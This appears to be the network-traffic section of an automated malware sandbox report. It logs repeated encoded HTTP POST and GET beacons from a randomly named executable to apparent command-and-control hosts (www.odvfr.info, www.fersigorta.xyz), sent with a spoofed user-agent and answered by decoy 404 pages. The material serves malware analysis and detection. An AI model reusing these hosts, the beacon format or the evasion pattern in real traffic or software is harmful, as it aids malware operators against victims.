                                                                                                                          Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6b 50 50 63 6e 44 67 71 39 73 79 30 32 37 79 52 4b 67 32 4a 34 30 66 6a 4a 51 4c 73 64 79 65 41 75 32 32 4f 4a 4c 7a 4f 6d 6b 4c 47 6d 6f 6e 55 61 6c 36 38 6f 64 43 68 36 50 70 76 53 4d 48 62 41 62 5a 53 51 4e 30 42 64 5f 62 33 46 64 5a 64 2d 71 62 58 45 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                                                                          Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="kPPcnDgq9sy027yRKg2J40fjJQLsdyeAu22OJLzOmkLGmonUal68odCh6PpvSMHbAbZSQN0Bd_b3FdZd-qbXEQ=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                                                                                                                          Jan 10, 2025 16:42:38.768816948 CET18INData Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: y></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.54998647.254.140.255802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:42:40.675348997 CET841OUTPOST /rl5p/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.odvfr.info
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 223
                                                                                                                          Origin: http://www.odvfr.info
                                                                                                                          Referer: http://www.odvfr.info/rl5p/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 5a 37 50 37 35 79 4f 6a 68 59 64 6a 35 52 72 45 6a 55 6a 51 41 65 4e 47 55 6f 76 62 4e 78 57 79 46 53 2f 4e 32 48 65 72 76 4e 6b 45 4a 50 76 67 73 4e 55 41 31 6d 6f 61 4e 78 52 44 35 56 42 33 7a 50 47 4d 35 6f 2f 4a 36 72 70 50 6e 72 59 2b 4b 61 62 46 54 4d 6b 34 78 43 6b 67 45 32 63 38 6c 6c 62 53 30 58 62 6f 6e 53 2b 53 58 34 39 43 42 68 6a 49 72 6c 62 30 2b 6e 6e 4e 4f 63 47 53 48 76 50 56 30 37 45 2b 4a 44 65 48 54 55 44 66 53 6a 74 70 57 4c 6d 68 62 72 6d 47 58 53 6e 66 39 61 73 2f 54 44 73 63 2b 52 4c 55 79 30 51 6f 36 38 69 6d 49 44 36 6a 54 58 46 57 2f 58 47 48 6f 5a 51 79 72 58 6b 54 46 69 35 4e 6c 79 7a 57 64 2f 75 4d 53 72 57 37 65 6a 30 41
                                                                                                                          Data Ascii: V8=Z7P75yOjhYdj5RrEjUjQAeNGUovbNxWyFS/N2HervNkEJPvgsNUA1moaNxRD5VB3zPGM5o/J6rpPnrY+KabFTMk4xCkgE2c8llbS0XbonS+SX49CBhjIrlb0+nnNOcGSHvPV07E+JDeHTUDfSjtpWLmhbrmGXSnf9as/TDsc+RLUy0Qo68imID6jTXFW/XGHoZQyrXkTFi5NlyzWd/uMSrW7ej0A
                                                                                                                          Jan 10, 2025 16:42:41.318680048 CET1236INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 10 Jan 2025 15:42:41 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          X-Trace: 2B2EA5E1440509EDF1D35A7BA1797064662FBD6D8431FC423EE8E18D6B00
                                                                                                                          Set-Cookie: _csrf=46d9ec36021cecbb201271f7429b7c09ce22841aaada7658682c9161af282745a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22sFeGQzX5g4VcFsVgC3KWW-AWyMUqmh7U%22%3B%7D; path=/; HttpOnly
                                                                                                                          Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 35 4a 50 4d 65 7a 55 41 5a 47 75 66 49 6c 5f 77 33 4a 59 37 4c 6c 57 79 36 55 5a 62 4d 49 69 45 2d 7a 61 6e 39 69 74 68 78 56 65 58 31 61 6b 38 5a 48 6f 38 58 76 67 57 43 5a 4f 61 35 57 31 4a 46 6f 47 69 45 51 77 64 79 64 4f 43 65 5f 4b 48 52 67 6e 79 41 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                                                                          Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="5JPMezUAZGufIl_w3JY7LlWy6UZbMIiE-zan9ithxVeX1ak8ZHo8XvgWCZOa5W1JFoGiEQwdydOCe_KHRgnyAg=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                                                                                                                          Jan 10, 2025 16:42:41.318716049 CET18INData Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: y></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.54998747.254.140.255802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:42:43.222773075 CET1858OUTPOST /rl5p/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.odvfr.info
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 1239
                                                                                                                          Origin: http://www.odvfr.info
                                                                                                                          Referer: http://www.odvfr.info/rl5p/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 5a 37 50 37 35 79 4f 6a 68 59 64 6a 35 52 72 45 6a 55 6a 51 41 65 4e 47 55 6f 76 62 4e 78 57 79 46 53 2f 4e 32 48 65 72 76 4e 73 45 4a 2b 50 67 73 71 41 41 30 6d 6f 61 48 52 52 47 35 56 42 75 7a 50 65 49 35 6f 37 5a 36 6f 52 50 6c 4e 45 2b 43 4c 62 46 47 63 6b 34 2b 69 6b 30 4a 57 63 54 6c 6c 4c 57 30 52 37 6f 6e 53 2b 53 58 36 6c 43 42 7a 48 49 70 6c 62 7a 2f 6e 6d 43 4b 63 48 63 48 76 6e 46 30 37 49 45 4a 33 69 48 54 77 76 66 55 56 35 70 4a 37 6d 2f 59 72 6d 4f 58 53 72 63 39 61 78 52 54 43 6f 79 2b 51 2f 55 68 42 39 5a 71 4f 66 2b 56 42 79 45 64 33 46 6e 71 67 79 4a 70 4a 4d 4a 75 48 59 7a 4f 32 68 52 77 6b 72 79 55 75 6a 48 45 50 47 42 4a 55 31 52 41 4e 4b 32 7a 59 53 5a 2f 54 73 4a 50 48 58 52 59 76 56 34 34 49 52 35 46 67 6f 6a 42 68 35 70 38 6f 47 65 73 74 65 49 56 35 4d 44 6c 32 75 71 4b 4b 2f 32 51 77 54 52 7a 74 42 69 66 30 57 69 6d 77 61 31 78 6d 67 47 30 58 61 57 72 78 62 50 6c 78 34 78 79 49 4a 77 70 64 30 67 35 32 61 37 71 73 78 4b 58 71 52 55 35 6d 58 77 6e 31 62 45 38 69 63 [TRUNCATED]
                                                                                                                          Data Ascii: V8=Z7P75yOjhYdj5RrEjUjQAeNGUovbNxWyFS/N2HervNsEJ+PgsqAA0moaHRRG5VBuzPeI5o7Z6oRPlNE+CLbFGck4+ik0JWcTllLW0R7onS+SX6lCBzHIplbz/nmCKcHcHvnF07IEJ3iHTwvfUV5pJ7m/YrmOXSrc9axRTCoy+Q/UhB9ZqOf+VByEd3FnqgyJpJMJuHYzO2hRwkryUujHEPGBJU1RANK2zYSZ/TsJPHXRYvV44IR5FgojBh5p8oGesteIV5MDl2uqKK/2QwTRztBif0Wimwa1xmgG0XaWrxbPlx4xyIJwpd0g52a7qsxKXqRU5mXwn1bE8iclP9V/OUzlyRMZMAM6qwnB8C7QbCISxDqPsmhl1FSht7lTI+PQ+H5QOFJ6ZmBkXj25RoEEgLTT74g+DdSL6YPS2RFKuo6qDx8N3OpHNDajjhW29EaLYLWRrmPGg+txDNvl/SjYbChONIxIitaWSgAy1eUf/J5DN4QlNDZzHvUzN8SVgQuqkQ9UqX+E/DUVU5+U5wRNLyeR+a9c2OvzhG7Ccz1/N1VWL2g2HDMMfI2AxILMdM2FwDYWzd5A/H25cmTt9mDNCFljbcJwqfHDeHTQ213sIstpami8kcGmtDBRUGKm0LLX/xlilrkhl17u+/1RelJKCK78IMjy6IAnUEpkpBH+teESxlwIv+7DAeYael92RsKhT/tAvsuWgL5l84a2zdDp+ntUMXaOJXAficsoSMEEkNF02aQEmPAom3fCmVBkzPpKyeK3UVRegc7UCzWg3wzpnJOaUneRWBhOmOhtYzIKfslIkZKgdoQibhYLJaSANU8WbjAzGJh8JnfOv+AWHIhJKh/NYYvNpaMD6TceXHh3jTzdAFQ/cpYBEhmUn7HSKfCfSXqMAnvt9fDP+AUniuBgJaQE75JwEwieb6GsX5lxaFDqjqaho4AfF6MFIAIZpo/lslnAsanqXmdR4o0vX0y6kgDRHNRNSQTy3HSqRX0afAj6b0T8C [TRUNCATED]
                                                                                                                          Jan 10, 2025 16:42:43.936732054 CET1236INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 10 Jan 2025 15:42:43 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          X-Trace: 2B1A9645E836DA16F8DD7CC6037B835F7FC2FFFD1F56941C22E61C784E00
                                                                                                                          Set-Cookie: _csrf=769a271172a1a33600c574635817d7b163ee9397884e6a4b356173dd8438dedba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22kN8BQdzrJHiDz2F7jvTAR5UZ6-2wG0eW%22%3B%7D; path=/; HttpOnly
                                                                                                                          Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 65 61 71 74 2d 73 38 4e 37 41 68 72 45 72 32 34 62 39 52 6b 62 68 68 77 46 5a 6e 46 41 72 48 38 44 57 53 44 78 4c 4a 42 31 54 45 53 35 4a 57 34 6e 6d 6d 57 65 69 46 61 31 50 77 56 35 69 4a 5a 63 67 5a 42 32 4a 63 33 35 4b 59 37 53 62 47 7a 39 58 47 77 5a 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                                                                          Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="eaqt-s8N7AhrEr24b9RkbhhwFZnFArH8DWSDxLJB1TES5JW4nmmWeiFa1PwV5iJZcgZB2Jc35KY7SbGz9XGwZg=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                                                                                                                          Jan 10, 2025 16:42:43.936772108 CET18INData Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: y></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.54998847.254.140.255802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:42:46.764769077 CET573OUTGET /rl5p/?Bb6h7=gBiPvnrHa&V8=U5nb6F2D+6Ub+BbGgn/WBcZABtiKGjnTMliNxQrWrtMhCM2XjoMK5ippUQtHm0xX3cajxvPhwbFvkKUzAaSZHL5crW9oCCkqzTfN0RC5pEjEcoIvYgKfrFT9zkKgJZ+CcA== HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.odvfr.info
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Jan 10, 2025 16:42:47.376975060 CET1236INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 10 Jan 2025 15:42:47 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          X-Trace: 2B4F552EDAF337E5D7845D348EA10E745893F97286B7A63F0677EE1DD900
                                                                                                                          Set-Cookie: _csrf=219e8a8ce99fa31eb463941af2ec4cb7ba5d4d144b3a88777ee74154657dea82a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22Ue2GhjZqRadBiFa74w7Ls5SA7NQhitfR%22%3B%7D; path=/; HttpOnly
                                                                                                                          Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 7a 6e 4c 4e 30 33 39 44 34 4a 57 75 47 7a 79 45 58 4a 56 2d 73 78 47 65 72 79 4d 37 5a 61 56 74 63 5a 46 71 6d 74 52 73 42 47 65 62 46 5f 2d 55 46 79 6d 36 35 50 78 36 57 4d 59 31 30 78 2d 45 4a 65 6d 59 62 30 68 51 39 69 78 47 33 7a 76 79 76 52 68 69 4e 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                                                                          Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="znLN039D4JWuGzyEXJV-sxGeryM7ZaVtcZFqmtRsBGebF_-UFym65Px6WMY10x-EJemYb0hQ9ixG3zvyvRhiNQ=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                                                                                                                          Jan 10, 2025 16:42:47.377021074 CET18INData Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: y></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.54998985.159.66.93802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:42:52.662290096 CET833OUTPOST /2a2y/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.fersigorta.xyz
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 203
                                                                                                                          Origin: http://www.fersigorta.xyz
                                                                                                                          Referer: http://www.fersigorta.xyz/2a2y/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 2b 70 63 4e 34 68 50 53 71 6b 4b 39 39 6a 62 66 6e 32 39 79 5a 4c 56 57 50 67 67 50 4f 38 4e 68 45 56 65 52 59 77 71 7a 4a 6b 2b 39 6e 7a 69 53 43 4c 43 44 42 68 2b 52 41 31 31 76 7a 63 30 50 6a 53 6b 35 77 46 57 61 63 35 74 55 63 34 56 4f 39 33 4a 54 79 73 43 55 7a 4d 76 31 69 4c 58 38 62 64 49 6a 34 52 55 35 69 71 30 72 57 74 59 6d 31 6e 39 68 44 4c 7a 71 63 65 43 52 78 72 37 48 7a 47 35 48 33 47 43 34 4c 50 72 52 45 59 58 35 5a 6e 34 5a 46 30 46 6a 51 4e 69 69 52 30 50 57 55 66 46 57 48 78 4f 74 55 31 44 59 2b 74 79 71 42 2b 7a 4f 47 6c 5a 7a 45 31 57 46 52 4a 30 36 49 43 47 42 55 57 45 3d
                                                                                                                          Data Ascii: V8=+pcN4hPSqkK99jbfn29yZLVWPggPO8NhEVeRYwqzJk+9nziSCLCDBh+RA11vzc0PjSk5wFWac5tUc4VO93JTysCUzMv1iLX8bdIj4RU5iq0rWtYm1n9hDLzqceCRxr7HzG5H3GC4LPrREYX5Zn4ZF0FjQNiiR0PWUfFWHxOtU1DY+tyqB+zOGlZzE1WFRJ06ICGBUWE=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.54999085.159.66.93802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:42:55.218323946 CET853OUTPOST /2a2y/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.fersigorta.xyz
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 223
                                                                                                                          Origin: http://www.fersigorta.xyz
                                                                                                                          Referer: http://www.fersigorta.xyz/2a2y/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 2b 70 63 4e 34 68 50 53 71 6b 4b 39 76 53 72 66 67 56 46 79 4d 62 56 52 41 41 67 50 45 63 4d 6f 45 56 43 52 59 78 76 75 4f 57 71 39 6d 53 53 53 46 4b 43 44 4d 42 2b 52 55 6c 31 32 2b 38 30 45 6a 53 59 75 77 46 61 61 63 39 39 55 63 34 6c 4f 36 45 78 55 79 38 43 53 37 73 76 33 2f 62 58 38 62 64 49 6a 34 52 51 44 69 71 38 72 57 39 6f 6d 6e 57 39 69 64 62 7a 70 52 4f 43 52 31 72 37 44 7a 47 34 39 33 45 6d 65 4c 4a 76 52 45 5a 6e 35 5a 7a 55 61 4c 30 46 35 65 74 6a 75 57 31 57 2b 56 4d 56 35 46 51 48 76 43 33 62 36 32 37 44 41 62 63 37 6d 56 46 31 4c 55 6d 65 79 41 35 56 54 53 68 57 78 4b 42 52 55 67 7a 58 73 54 47 48 4f 75 33 37 66 4a 55 41 32 78 30 4c 46
                                                                                                                          Data Ascii: V8=+pcN4hPSqkK9vSrfgVFyMbVRAAgPEcMoEVCRYxvuOWq9mSSSFKCDMB+RUl12+80EjSYuwFaac99Uc4lO6ExUy8CS7sv3/bX8bdIj4RQDiq8rW9omnW9idbzpROCR1r7DzG493EmeLJvREZn5ZzUaL0F5etjuW1W+VMV5FQHvC3b627DAbc7mVF1LUmeyA5VTShWxKBRUgzXsTGHOu37fJUA2x0LF


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.54999185.159.66.93802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:42:57.765121937 CET1870OUTPOST /2a2y/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.fersigorta.xyz
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 1239
                                                                                                                          Origin: http://www.fersigorta.xyz
                                                                                                                          Referer: http://www.fersigorta.xyz/2a2y/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 2b 70 63 4e 34 68 50 53 71 6b 4b 39 76 53 72 66 67 56 46 79 4d 62 56 52 41 41 67 50 45 63 4d 6f 45 56 43 52 59 78 76 75 4f 57 53 39 6e 67 71 53 44 70 71 44 4e 42 2b 52 58 6c 31 72 2b 38 30 6a 6a 53 77 69 77 46 47 4b 63 2f 31 55 64 5a 46 4f 37 31 78 55 38 38 43 53 33 4d 76 30 69 4c 58 74 62 64 59 6e 34 52 67 44 69 71 38 72 57 37 73 6d 6c 48 39 69 66 62 7a 71 63 65 43 56 78 72 37 72 7a 48 51 48 33 45 6a 6a 4c 35 50 52 46 35 33 35 65 41 73 61 55 45 46 2f 5a 74 69 7a 57 31 71 68 56 4d 4a 66 46 51 7a 52 43 31 4c 36 6d 37 4f 66 49 65 6a 61 50 58 35 61 59 6e 69 79 55 4e 4a 55 56 43 57 43 47 77 68 47 6e 33 66 76 53 52 58 32 6b 55 57 48 59 53 73 38 67 67 32 2f 46 2b 47 69 35 48 46 76 38 4f 38 56 4a 6d 33 42 37 6c 59 42 42 70 4e 41 58 4d 30 4c 4f 36 6b 35 4a 65 41 77 34 5a 76 2f 78 7a 58 30 67 45 52 34 48 64 4b 47 63 73 67 37 4f 6c 75 63 36 2b 33 6d 56 35 46 33 7a 33 49 76 6a 4f 43 57 48 61 58 31 52 56 4f 64 72 51 53 73 37 46 2b 6b 4b 6b 5a 78 4b 68 2f 34 76 4e 5a 32 57 57 6d 73 38 44 5a 4c 43 58 44 [TRUNCATED]
